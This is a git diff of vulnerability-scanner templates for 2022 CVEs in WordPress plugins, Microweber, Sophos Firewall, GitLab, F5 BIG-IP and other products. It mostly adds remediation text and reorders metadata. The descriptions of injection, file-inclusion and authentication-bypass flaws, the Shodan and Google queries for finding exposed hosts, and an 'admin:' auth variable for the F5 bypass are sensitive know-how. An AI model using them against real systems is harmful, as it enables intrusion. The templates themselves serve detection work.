tags: cve,cve2022,authenticated,huntr,xss,microweber,cms diff --git a/http/cves/2022/CVE-2022-0948.yaml b/http/cves/2022/CVE-2022-0948.yaml index 391c27287a..2b23308e86 100644 --- a/http/cves/2022/CVE-2022-0948.yaml +++ b/http/cves/2022/CVE-2022-0948.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Order Listener for WooCommerce plugin before 3.2.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update the WordPress Order Listener for WooCommerce plugin to version 3.2.2 or later. reference: - https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576 - https://wordpress.org/plugins/woc-order-alert/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-0948 cwe-id: CWE-89 epss-score: 0.03849 - cpe: cpe:2.3:a:pluginbazaar:order_listener_for_woocommerce:*:*:*:*:*:wordpress:*:* epss-percentile: 0.90743 + cpe: cpe:2.3:a:pluginbazaar:order_listener_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: pluginbazaar product: order_listener_for_woocommerce + framework: wordpress tags: cve,wp,unauth,sqli,woc-order-alert,wpscan,cve2022,wordpress,wp-plugin http: diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index e795098e19..4701d4112b 100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml @@ -6,25 +6,25 @@ info: severity: critical description: | WordPress Stop Bad Bots plugin before 6.930 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: Fixed in version 6.930. reference: - https://wpscan.com/vulnerability/a0fbb79a-e160-49df-9cf2-18ab64ea66cb - https://wordpress.org/plugins/stopbadbots/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0949 - remediation: Fixed in version 6.930. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0949 cwe-id: CWE-89 epss-score: 0.02077 - cpe: cpe:2.3:a:stopbadbots:block_and_stop_bad_bots:*:*:*:*:*:wordpress:*:* epss-percentile: 0.87641 + cpe: cpe:2.3:a:stopbadbots:block_and_stop_bad_bots:*:*:*:*:*:wordpress:*:* metadata: - max-request: 3 verified: true - framework: wordpress + max-request: 3 vendor: stopbadbots product: block_and_stop_bad_bots + framework: wordpress tags: cve,stopbadbots,wp-plugin,wp,unauth,wpscan,cve2022,sqli,wordpress variables: IP: '{{rand_ip("1.1.1.0/24")}}' diff --git a/http/cves/2022/CVE-2022-0952.yaml b/http/cves/2022/CVE-2022-0952.yaml index f5a9b6a037..c08729256e 100644 --- a/http/cves/2022/CVE-2022-0952.yaml +++ b/http/cves/2022/CVE-2022-0952.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Sitemap by click5 plugin before 1.0.36 is susceptible to missing authorization. The plugin does not have authorization or CSRF checks when updating options via a REST endpoint and does not ensure that the option to be updated belongs to the plugin. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress Sitemap plugin by click5 (1.0.36 or higher) to fix the missing authorization issue. reference: - https://wpscan.com/vulnerability/0f694961-afab-44f9-846c-e80a0f6c768b - https://nvd.nist.gov/vuln/detail/CVE-2022-0952 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-0952 cwe-id: CWE-352 epss-score: 0.03442 - cpe: cpe:2.3:a:sitemap_project:sitemap:*:*:*:*:*:wordpress:*:* epss-percentile: 0.90248 + cpe: cpe:2.3:a:sitemap_project:sitemap:*:*:*:*:*:wordpress:*:* metadata: - max-request: 3 verified: true - framework: wordpress + max-request: 3 vendor: sitemap_project product: sitemap + framework: wordpress tags: wp,wp-plugin,sitemap,wpscan,cve,cve2022,wordpress http: diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index e317c298ce..9c924a9b54 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Microweber before 1.2.1 contains multiple stored cross-site scripting vulnerabilities in Shop's Other Settings, Autorespond E-mail Settings, and Payment Methods. + remediation: | + Upgrade Microweber to version 1.2.11 or later to mitigate this vulnerability. reference: - https://github.com/advisories/GHSA-8c76-mxv5-w4g8 - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/ @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-0954 cwe-id: CWE-79 epss-score: 0.00192 - cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* epss-percentile: 0.55945 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: microweber product: microweber tags: cve,cve2022,xss,microweber,huntr diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml index 8499f7077f..1909c76f23 100644 --- a/http/cves/2022/CVE-2022-0963.yaml +++ b/http/cves/2022/CVE-2022-0963.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability. It allows unrestricted upload of XML files,. + remediation: | + Upgrade Microweber CMS to version 1.2.12 or later to mitigate the vulnerability. reference: - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c/ - https://github.com/advisories/GHSA-q3x2-jvp3-wj78 @@ -18,11 +20,11 @@ info: cve-id: CVE-2022-0963 cwe-id: CWE-79 epss-score: 0.00192 - cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* epss-percentile: 0.55945 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: microweber product: microweber tags: xss,microweber,cms,authenticated,huntr,cve,cve2022,intrusive diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index b91204eabe..be64187d50 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -6,21 +6,21 @@ info: severity: medium description: | Microweber before 1.2.12 is susceptible to integer overflow. The application allows large characters to insert in the input field 'first & last name,' which can allow an attacker to cause a denial of service via a crafted HTTP request. + remediation: First name and last name input should be limited to 50 characters or maximum 100 characters. reference: - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e/ - https://github.com/advisories/GHSA-5fxv-xx5p-g2fv - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e - https://nvd.nist.gov/vuln/detail/CVE-2022-0968 - https://github.com/microweber/microweber/commit/80e39084729a57dfe749626c3b9d35247a14c49e - remediation: First name and last name input should be limited to 50 characters or maximum 100 characters. classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H cvss-score: 5.5 cve-id: CVE-2022-0968 cwe-id: CWE-190 epss-score: 0.00091 - cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* epss-percentile: 0.38112 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: microweber diff --git a/http/cves/2022/CVE-2022-1007.yaml b/http/cves/2022/CVE-2022-1007.yaml index 0d50f91768..63fbe08423 100644 --- a/http/cves/2022/CVE-2022-1007.yaml +++ b/http/cves/2022/CVE-2022-1007.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Advanced Booking Calendar plugin before 1.7.1 contains a cross-site scripting vulnerability. It does not sanitize and escape the room parameter before outputting it back in an admin page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to WordPress Advanced Booking Calendar plugin version 1.7.1 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/6f5b764b-d13b-4371-9cc5-91204d9d6358 - https://wordpress.org/plugins/advanced-booking-calendar/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-1007 cwe-id: CWE-79 epss-score: 0.00112 - cpe: cpe:2.3:a:elbtide:advanced_booking_calendar:*:*:*:*:*:wordpress:*:* epss-percentile: 0.43971 + cpe: cpe:2.3:a:elbtide:advanced_booking_calendar:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: elbtide product: advanced_booking_calendar + framework: wordpress tags: wp-plugin,advanced-booking-calendar,cve,cve2022,wp,authenticated,wpscan,wordpress,xss http: diff --git a/http/cves/2022/CVE-2022-1013.yaml b/http/cves/2022/CVE-2022-1013.yaml index 9d777dff1b..0cd5365e21 100644 --- a/http/cves/2022/CVE-2022-1013.yaml +++ b/http/cves/2022/CVE-2022-1013.yaml @@ -6,25 +6,25 @@ info: severity: critical description: | WordPress Personal Dictionary plugin before 1.3.4 contains a blind SQL injection vulnerability. The plugin fails to properly sanitize user-supplied POST data before being interpolated in an SQL statement and executed. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: Fixed in version 1.3.4. reference: - https://wpscan.com/vulnerability/eed70659-9e3e-42a2-b427-56c52e0fbc0d - https://wordpress.org/plugins/personal-dictionary/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1013 - remediation: Fixed in version 1.3.4. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-1013 cwe-id: CWE-89 epss-score: 0.01144 - cpe: cpe:2.3:a:ays-pro:personal_dictionary:*:*:*:*:*:wordpress:*:* epss-percentile: 0.82961 + cpe: cpe:2.3:a:ays-pro:personal_dictionary:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: ays-pro product: personal_dictionary + framework: wordpress tags: wp,unauth,wpscan,cve,cve2022,sqli,wordpress,wp-plugin,personal-dictionary http: diff --git a/http/cves/2022/CVE-2022-1020.yaml b/http/cves/2022/CVE-2022-1020.yaml index b80d5108f4..dbd5af8cad 100644 --- a/http/cves/2022/CVE-2022-1020.yaml +++ b/http/cves/2022/CVE-2022-1020.yaml @@ -5,6 +5,8 @@ info: author: Akincibor severity: critical description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument. + remediation: | + Update WordPress WooCommerce plugin to version 3.1.2 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5 - https://nvd.nist.gov/vuln/detail/CVE-2022-1020 @@ -14,13 +16,13 @@ info: cve-id: CVE-2022-1020 cwe-id: CWE-352 epss-score: 0.00614 - cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:* epss-percentile: 0.76048 + cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: codeastrology product: woo_product_table + framework: wordpress tags: wpscan,wp,wp-plugin,wordpress,cve,cve2022,unauth http: diff --git a/http/cves/2022/CVE-2022-1040.yaml b/http/cves/2022/CVE-2022-1040.yaml index 0258c25b77..21d5d1cbc3 100644 --- a/http/cves/2022/CVE-2022-1040.yaml +++ b/http/cves/2022/CVE-2022-1040.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Sophos Firewall version v18.5 MR3 and older contains an authentication bypass vulnerability in the User Portal and Webadmin which could allow a remote attacker to execute code. + remediation: | + Upgrade to a patched version of Sophos Firewall (>=18.5 MR4) to mitigate this vulnerability. reference: - https://github.com/killvxk/CVE-2022-1040 - https://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-1040 cwe-id: CWE-287 epss-score: 0.97499 - cpe: cpe:2.3:o:sophos:sfos:*:*:*:*:*:*:*:* epss-percentile: 0.99961 + cpe: cpe:2.3:o:sophos:sfos:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"Sophos" verified: true + max-request: 1 vendor: sophos product: sfos + shodan-query: http.title:"Sophos" tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev http: diff --git a/http/cves/2022/CVE-2022-1054.yaml b/http/cves/2022/CVE-2022-1054.yaml index cb54c8285a..db1727b202 100644 --- a/http/cves/2022/CVE-2022-1054.yaml +++ b/http/cves/2022/CVE-2022-1054.yaml @@ -5,6 +5,8 @@ info: author: Akincibor severity: medium description: WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to missing authorization. The plugin does not have any authorization checks when exporting its entries, and the export function is hooked to the init action. An attacker can potentially retrieve sensitive information such as first name, last name, and email address of users registered for events, + remediation: | + Update the WordPress RSVP and Event Management plugin to version 2.7.8 or later. reference: - https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d classification: @@ -13,13 +15,13 @@ info: cve-id: CVE-2022-1054 cwe-id: CWE-862 epss-score: 0.0033 - cpe: cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:wordpress:*:* epss-percentile: 0.67328 + cpe: cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: wpchill product: rsvp_and_event_management + framework: wordpress tags: wordpress,cve,cve2022,wpscan,wp,wp-plugin http: diff --git a/http/cves/2022/CVE-2022-1057.yaml b/http/cves/2022/CVE-2022-1057.yaml index dd62369a81..8a3f9e0e6b 100644 --- a/http/cves/2022/CVE-2022-1057.yaml +++ b/http/cves/2022/CVE-2022-1057.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the Pricing Deals for WooCommerce plugin (2.0.2.03 or higher) to fix the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/7c33ffc3-84d1-4a0f-a837-794cdc3ad243 - https://wordpress.org/plugins/pricing-deals-for-woocommerce/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-1057 cwe-id: CWE-89 epss-score: 0.01851 - cpe: cpe:2.3:a:varktech:pricing_deals_for_woocommerce:*:*:*:*:*:wordpress:*:* epss-percentile: 0.8685 + cpe: cpe:2.3:a:varktech:pricing_deals_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: varktech product: pricing_deals_for_woocommerce + framework: wordpress tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,pricing-deals-for-woocommerce,unauth http: diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml index 32368a8832..65268c52ea 100644 --- a/http/cves/2022/CVE-2022-1058.yaml +++ b/http/cves/2022/CVE-2022-1058.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Gitea before 1.16.5 is susceptible to open redirect via GitHub repository go-gitea/gitea. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Gitea to version 1.16.5 or later to fix the open redirect vulnerability. reference: - https://github.com/go-gitea/gitea/commit/e3d8e92bdc67562783de9a76b5b7842b68daeb48 - https://huntr.dev/bounties/4fb42144-ac70-4f76-a5e1-ef6b5e55dc0d @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-1058 cwe-id: CWE-601 epss-score: 0.00112 - cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* epss-percentile: 0.43971 + cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: title:"Gitea" verified: true + max-request: 2 vendor: gitea product: gitea + shodan-query: title:"Gitea" tags: huntr,cve,cve2022,open-redirect,gitea http: diff --git a/http/cves/2022/CVE-2022-1119.yaml b/http/cves/2022/CVE-2022-1119.yaml index b0fdc4675e..1af71e5270 100644 --- a/http/cves/2022/CVE-2022-1119.yaml +++ b/http/cves/2022/CVE-2022-1119.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files. + remediation: | + Update WordPress Simple File List to version 3.2.8 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e - https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606 @@ -18,13 +20,13 @@ info: cve-id: CVE-2022-1119 cwe-id: CWE-22 epss-score: 0.29102 - cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* epss-percentile: 0.96285 + cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: simplefilelist product: simple-file-list + framework: wordpress tags: wp,wp-plugin,wpscan,cve,cve2022,lfi,wordpress http: diff --git a/http/cves/2022/CVE-2022-1162.yaml b/http/cves/2022/CVE-2022-1162.yaml index c90f990cb6..75f563dbea 100644 --- a/http/cves/2022/CVE-2022-1162.yaml +++ b/http/cves/2022/CVE-2022-1162.yaml @@ -5,26 +5,26 @@ info: author: GitLab Red Team severity: critical description: GitLab CE/EE contains a hard-coded credentials vulnerability. A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML), allowing attackers to potentially take over accounts. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Affected versions are 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2. + remediation: Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the reference section below. reference: - https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1162.json - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1162 - http://packetstormsecurity.com/files/166828/Gitlab-14.9-Authentication-Bypass.html - https://nvd.nist.gov/vuln/detail/cve-2022-1162 - remediation: Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the reference section below. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-1162 cwe-id: CWE-798 epss-score: 0.20604 - cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* epss-percentile: 0.95726 + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 - shodan-query: http.title:"GitLab" vendor: gitlab product: gitlab + shodan-query: http.title:"GitLab" tags: cve,cve2022,gitlab,packetstorm http: diff --git a/http/cves/2022/CVE-2022-1168.yaml b/http/cves/2022/CVE-2022-1168.yaml index e5e4e13ace..49465e3860 100644 --- a/http/cves/2022/CVE-2022-1168.yaml +++ b/http/cves/2022/CVE-2022-1168.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WP JobSearch plugin prior to 1.5.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WP JobSearch plugin (1.5.1 or higher) to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/bcf38e87-011e-4540-8bfb-c93443a4a490 - https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856 @@ -16,15 +18,15 @@ info: cve-id: CVE-2022-1168 cwe-id: CWE-79 epss-score: 0.00112 - cpe: cpe:2.3:a:eyecix:jobsearch_wp_job_board:*:*:*:*:*:wordpress:*:* epss-percentile: 0.43971 + cpe: cpe:2.3:a:eyecix:jobsearch_wp_job_board:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - google-query: inurl:"wp-content/plugins/wp-jobsearch" verified: true - framework: wordpress + max-request: 1 vendor: eyecix product: jobsearch_wp_job_board + framework: wordpress + google-query: inurl:"wp-content/plugins/wp-jobsearch" tags: wp-jobsearch",wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss http: diff --git a/http/cves/2022/CVE-2022-1221.yaml b/http/cves/2022/CVE-2022-1221.yaml index 080c66e946..30cecbc7fc 100644 --- a/http/cves/2022/CVE-2022-1221.yaml +++ b/http/cves/2022/CVE-2022-1221.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes. + remediation: | + Update to the latest version of the WordPress Gwyn's Imagemap Selector plugin (0.3.3) or apply the vendor-supplied patch to fix the vulnerability. reference: - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221 @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-1221 cwe-id: CWE-79 epss-score: 0.00119 - cpe: cpe:2.3:a:gwyn\'s_imagemap_selector_project:gwyn\'s_imagemap_selector:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45304 + cpe: cpe:2.3:a:gwyn\'s_imagemap_selector_project:gwyn\'s_imagemap_selector:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: gwyn\'s_imagemap_selector_project product: gwyn\'s_imagemap_selector + framework: wordpress tags: cve2022,wpscan,xss,wordpress,wp-plugin,wp,cve http: diff --git a/http/cves/2022/CVE-2022-1329.yaml b/http/cves/2022/CVE-2022-1329.yaml index e3c5049c73..d6b32bb527 100644 --- a/http/cves/2022/CVE-2022-1329.yaml +++ b/http/cves/2022/CVE-2022-1329.yaml @@ -6,26 +6,26 @@ info: severity: high description: | The Elementor Website Builder plugin for WordPress versions 3.6.0 to 3.6.2 are vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file. This makes it possible for attackers to modify site data and upload malicious files which can be used to obtain remote code execution. + remediation: Fixed in version 3.6.3 reference: - https://www.wordfence.com/blog/2022/04/elementor-critical-remote-code-execution-vulnerability/ - https://wordpress.org/plugins/elementor/ - https://plugins.trac.wordpress.org/changeset/2708766/elementor/trunk/core/app/modules/onboarding/module.php - https://nvd.nist.gov/vuln/detail/CVE-2022-1329 - remediation: Fixed in version 3.6.3 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-1329 cwe-id: CWE-434,CWE-862 epss-score: 0.96419 - cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* epss-percentile: 0.99372 + cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: - max-request: 4 verified: true - framework: wordpress + max-request: 4 vendor: elementor product: website_builder + framework: wordpress tags: cve,cve2022,rce,wordpress,wp-plugin,wp,elementor,authenticated,intrusive,fileupload http: diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index 4a03063335..a7fddb3f84 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Fusion Builder plugin before 3.6.2 is susceptible to server-side request forgery. The plugin does not validate a parameter in its forms, which can be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. An attacker can potentially interact with hosts on the server's local network, bypass firewalls, and access control measures. + remediation: | + Update to the latest version of WordPress Fusion Builder plugin (3.6.2) or apply the vendor-provided patch. reference: - https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b - https://www.rootshellsecurity.net/rootshell-discovered-a-critical-vulnerability-in-top-wordpress-theme/ @@ -17,13 +19,13 @@ info: cve-id: CVE-2022-1386 cwe-id: CWE-918 epss-score: 0.08014 - cpe: cpe:2.3:a:theme-fusion:avada:*:*:*:*:*:wordpress:*:* epss-percentile: 0.93446 + cpe: cpe:2.3:a:theme-fusion:avada:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: theme-fusion product: avada + framework: wordpress tags: wpscan,cve,cve2022,wordpress,ssrf,themefusion,wp,fusion,avada,intrusive http: diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml index 328923db65..e0273b3225 100644 --- a/http/cves/2022/CVE-2022-1388.yaml +++ b/http/cves/2022/CVE-2022-1388.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, may allow undisclosed requests to bypass iControl REST authentication. + remediation: | + Apply the necessary security patches or updates provided by F5 Networks to mitigate this vulnerability. reference: - https://twitter.com/GossiTheDog/status/1523566937414193153 - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-1388 cwe-id: CWE-306 epss-score: 0.9748 - cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* epss-percentile: 0.9995 + cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" verified: true + max-request: 2 vendor: f5 product: big-ip_access_policy_manager + shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" tags: f5,bigip,cve,cve2022,rce,mirai,kev variables: auth: "admin:" diff --git a/http/cves/2022/CVE-2022-1390.yaml b/http/cves/2022/CVE-2022-1390.yaml index 0ee9dfb5a7..b63c6b5bb5 100644 --- a/http/cves/2022/CVE-2022-1390.yaml +++ b/http/cves/2022/CVE-2022-1390.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique. + remediation: | + Update to the latest version of the WordPress Admin Word Count Column plugin (2.2 or higher) to fix the local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html - https://wordpress.org/plugins/admin-word-count-column/ @@ -17,13 +19,13 @@ info: cve-id: CVE-2022-1390 cwe-id: CWE-22 epss-score: 0.96676 - cpe: cpe:2.3:a:admin_word_count_column_project:admin_word_count_column:*:*:*:*:*:wordpress:*:* epss-percentile: 0.99485 + cpe: cpe:2.3:a:admin_word_count_column_project:admin_word_count_column:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: admin_word_count_column_project product: admin_word_count_column + framework: wordpress tags: packetstorm,wpscan,cve,cve2022,wordpress,wp-plugin,lfi,wp http: diff --git a/http/cves/2022/CVE-2022-1391.yaml b/http/cves/2022/CVE-2022-1391.yaml index 3f89e4dd0a..551b816e81 100644 --- a/http/cves/2022/CVE-2022-1391.yaml +++ b/http/cves/2022/CVE-2022-1391.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues. + remediation: | + Update to the latest version of the WordPress Cab fare calculator plugin (1.0.4) to fix the local file inclusion vulnerability. reference: - https://www.exploit-db.com/exploits/50843 - https://wordpress.org/plugins/cab-fare-calculator @@ -17,13 +19,13 @@ info: cve-id: CVE-2022-1391 cwe-id: CWE-22 epss-score: 0.02167 - cpe: cpe:2.3:a:kanev:cab_fare_calculator:*:*:*:*:*:wordpress:*:* epss-percentile: 0.87921 + cpe: cpe:2.3:a:kanev:cab_fare_calculator:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: kanev product: cab_fare_calculator + framework: wordpress tags: cve2022,wordpress,wp-plugin,lfi,wp,edb,wpscan,cve http: diff --git a/http/cves/2022/CVE-2022-1392.yaml b/http/cves/2022/CVE-2022-1392.yaml index e279300c76..3e4bf5c3a2 100644 --- a/http/cves/2022/CVE-2022-1392.yaml +++ b/http/cves/2022/CVE-2022-1392.yaml @@ -5,6 +5,8 @@ info: author: Veshraj severity: high description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion. + remediation: | + Upgrade to the latest version of WordPress Videos sync PDF plugin (>=1.7.5) or apply the vendor-provided patch to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 - https://packetstormsecurity.com/files/166534/ @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-1392 cwe-id: CWE-22 